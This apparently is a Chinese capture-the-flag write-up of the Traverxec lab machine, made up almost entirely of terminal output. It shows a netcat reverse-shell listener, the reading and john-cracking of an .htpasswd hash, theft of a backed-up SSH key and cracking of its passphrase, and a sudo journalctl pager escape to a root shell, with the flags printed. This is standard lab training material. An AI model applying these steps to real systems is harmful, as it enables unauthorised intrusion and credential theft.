┌──(kali㉿kali)-[~/桌面] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.165] 59770 bash: cannot set terminal process group (548): Inappropriate ioctl for device bash: no job control in this shell www-data@traverxec:/usr/bin$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@traverxec:/usr/bin$
www-data@traverxec:/usr/bin$ cd /var/ cd /var/ www-data@traverxec:/var$ ls ls backups cache lib local lock log mail nostromo opt run spool tmp www-data@traverxec:/var$ cd nostromo cd nostromo www-data@traverxec:/var/nostromo$ ls -la ls -la total 24 drwxr-xr-x 6 root root 4096 Oct 25 2019 . drwxr-xr-x 12 root root 4096 Oct 25 2019 .. drwxr-xr-x 2 root daemon 4096 Oct 27 2019 conf drwxr-xr-x 6 root daemon 4096 Oct 25 2019 htdocs drwxr-xr-x 2 root daemon 4096 Oct 25 2019 icons drwxr-xr-x 2 www-data daemon 4096 Dec 9 06:44 logs www-data@traverxec:/var/nostromo$ cd conf cd conf www-data@traverxec:/var/nostromo/conf$ ls -la ls -la total 20 drwxr-xr-x 2 root daemon 4096 Oct 27 2019 . drwxr-xr-x 6 root root 4096 Oct 25 2019 .. -rw-r--r-- 1 root bin 41 Oct 25 2019 .htpasswd -rw-r--r-- 1 root bin 2928 Oct 25 2019 mimes -rw-r--r-- 1 root bin 498 Oct 25 2019 nhttpd.conf www-data@traverxec:/var/nostromo/conf$ cat .htpasswd cat .htpasswd david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/ www-data@traverxec:/var/nostromo/conf$
┌──(kali㉿kali)-[~/桌面] └─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash Warning: detected hashtype"md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 ASIMD 4x2]) Will run 3 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Nowonly4me (david) 1g 0:00:01:43 DONE (2023-12-09 20:10) 0.009675g/s 102352p/s 102352c/s 102352C/s Noyoudo..November^ Use the "--show" option to display all of the cracked passwords reliably Session completed.
┌──(kali㉿kali)-[~/桌面] └─$ ssh david@10.10.10.165 The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established. ED25519 key fingerprint is SHA256:AbyOr506Yqq/VclZ900M6Ijj6qCoveykzcpc/cuIB14. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.165' (ED25519) to the list of known hosts. david@10.10.10.165's password: Permission denied, please try again. david@10.10.10.165's password: david@10.10.10.165: Permission denied (publickey,password).
homedirs /home homedirs_public public_www www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www ls -la /home/david/public_www total 16 drwxr-xr-x 3 david david 4096 Oct 25 2019 . drwx--x--x 5 david david 4096 Oct 25 2019 .. -rw-r--r-- 1 david david 402 Oct 25 2019 index.html drwxr-xr-x 2 david david 4096 Oct 25 2019 protected-file-area www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area <conf$ cd /home/david/public_www/protected-file-area www-data@traverxec:/home/david/public_www/protected-file-area$ ls ls backup-ssh-identity-files.tgz www-data@traverxec:/home/david/public_www/protected-file-area$ ls -la ls -la total 16 drwxr-xr-x 2 david david 4096 Oct 25 2019 . drwxr-xr-x 3 david david 4096 Oct 25 2019 .. -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess -rw-r--r-- 1 david david 1915 Oct 25 2019 backup-ssh-identity-files.tgz www-data@traverxec:/home/david/public_www/protected-file-area$
┌──(kali㉿kali)-[~/桌面/home/david/.ssh] └─$ ls -la 总计 20 drwx------ 2 kali kali 4096 2019年10月26日 . drwxr-xr-x 3 kali kali 4096 12月 9日 20:39 .. -rw-r--r-- 1 kali kali 397 2019年10月26日 authorized_keys -rw------- 1 kali kali 1766 2019年10月26日 id_rsa -rw-r--r-- 1 kali kali 397 2019年10月26日 id_rsa.pub ┌──(kali㉿kali)-[~/桌面/home/david/.ssh] └─$ cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsXrsMQc0U71GVXMQcTOYIH2ZvCwpxTxN1jOYbTutvNyYThEIjYpCVs5DKhZi2rNunI8Z+Ey/FC9bpmCiJtao0xxIbJ02c+H6q13aAFrTv61GAzi5neX4Lj2E/pIhd3JBFYRIQw97C66MO3UVqxKcnGrCvYnhJvKMw7nSRI/cXTPHAEnwU0+NW2zBKId8cRRLxGFyM49pjDZPsAVgGlfdBD380vVa9dMrJ/T13vDTZZGoDgcq9gRtD1B6NJoLHaRWH4ikRuQvLWjk3nWDDaRjw6MxmRtLk8h0MM7+IiBYc6NJvbQzpG5M5oM0FvhawQetN71KcZ4jUVxN3m+YkaqHD david@traverxec
┌──(kali㉿kali)-[~/桌面/home/david/.ssh] └─$ ls -la 总计 24 drwx------ 2 kali kali 4096 12月 9日 20:42 . drwxr-xr-x 3 kali kali 4096 12月 9日 20:39 .. -rw-r--r-- 1 kali kali 397 2019年10月26日 authorized_keys -rw-r--r-- 1 kali kali 2458 12月 9日 20:42 hash-david.txt -rw------- 1 kali kali 1766 2019年10月26日 id_rsa -rw-r--r-- 1 kali kali 397 2019年10月26日 id_rsa.pub
┌──(kali㉿kali)-[~/桌面/home/david/.ssh] └─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash-david.txt [sudo] kali 的密码: Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 3 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status hunter (id_rsa) 1g 0:00:00:00 DONE (2023-12-09 20:43) 100.0g/s 14400p/s 14400c/s 14400C/s america..sandra Use the "--show" option to display all of the cracked passwords reliably Session completed.
9、接下来成功登录,并获取到第一个flag文件
1 2 3 4 5 6 7 8 9 10 11 12
┌──(kali㉿kali)-[~/桌面/home/david/.ssh] └─$ ssh david@10.10.10.165 -i id_rsa Enter passphrase for key 'id_rsa': Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 david@traverxec:~$ david@traverxec:~$ id uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) david@traverxec:~$ ls bin public_www user.txt david@traverxec:~$ cat user.txt 210c7881934afefed73f13a30a109522 david@traverxec:~$
0x02 系统权限获取
10、尝试使用sudo -l 发现需要使用密码
1 2 3 4 5 6 7 8
david@traverxec:~$ sudo -l [sudo] password for david: Sorry, try again. [sudo] password for david: Sorry, try again. [sudo] password for david: sudo: 3 incorrect password attempts david@traverxec:~$
11、当前用户根目录下存在一个特殊 bin 目录
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
david@traverxec:~$ ls -la total 36 drwx--x--x 5 david david 4096 Oct 25 2019 . drwxr-xr-x 3 root root 4096 Oct 25 2019 .. lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null -rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout -rw-r--r-- 1 david david 3526 Oct 25 2019 .bashrc drwx------ 2 david david 4096 Oct 25 2019 bin -rw-r--r-- 1 david david 807 Oct 25 2019 .profile drwxr-xr-x 3 david david 4096 Oct 25 2019 public_www drwx------ 2 david david 4096 Oct 25 2019 .ssh -r--r----- 1 root david 33 Dec 9 06:44 user.txt david@traverxec:~$ ls -la bin total 16 drwx------ 2 david david 4096 Oct 25 2019 . drwx--x--x 5 david david 4096 Oct 25 2019 .. -r-------- 1 david david 802 Oct 25 2019 server-stats.head -rwx------ 1 david david 363 Oct 25 2019 server-stats.sh david@traverxec:~$
david@traverxec:~$ cd bin/ david@traverxec:~/bin$ ls server-stats.head server-stats.sh david@traverxec:~/bin$ cat server-stats. cat: server-stats.: No such file or directory david@traverxec:~/bin$ cat server-stats.sh #!/bin/bash
Last 5 journal log lines: -- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 07:55:03 EST. -- Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=www-data Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation failed Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not identify password for [www-data] Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=list Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data) david@traverxec:~/bin$
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl [sudo] password for david: Sorry, try again. [sudo] password for david: Sorry, try again. [sudo] password for david: sudo: 3 incorrect password attempts david@traverxec:~/bin$ david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service -- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 08:00:08 Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication fai Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation faile Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not ide Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pt Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data) ...skipping... -- Logs begin at Sat 2023-12-09 06:43:59 EST, end at Sat 2023-12-09 08:00:08 Dec 09 07:20:56 traverxec sudo[1047]: pam_unix(sudo:auth): authentication fai Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): conversation faile Dec 09 07:20:59 traverxec sudo[1047]: pam_unix(sudo:auth): auth could not ide Dec 09 07:20:59 traverxec sudo[1047]: www-data : command not allowed ; TTY=pt Dec 09 07:20:59 traverxec crontab[1108]: (www-data) LIST (www-data) ~ ~ ~ ~ ~ !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) # cat /root/root.txt 1c4b05168db831689a52997559f73dc7 #
